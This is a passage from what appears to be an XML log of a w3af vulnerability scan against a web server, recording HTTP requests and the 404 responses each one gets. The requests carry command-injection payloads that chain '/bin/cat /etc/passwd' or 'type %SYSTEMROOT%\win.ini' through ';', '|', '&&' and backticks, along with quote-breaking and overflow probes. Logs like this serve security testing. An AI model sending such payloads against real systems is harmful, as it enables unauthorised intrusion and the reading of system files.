&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22zzrpn%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="263">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="264">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="266">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="268">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="270">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="271">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="272">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="273">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="274">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="276">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="277">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="278">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="280">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="283">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="285">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="295">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/4nV4dSKX HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="307">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="308">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="310">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="314">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
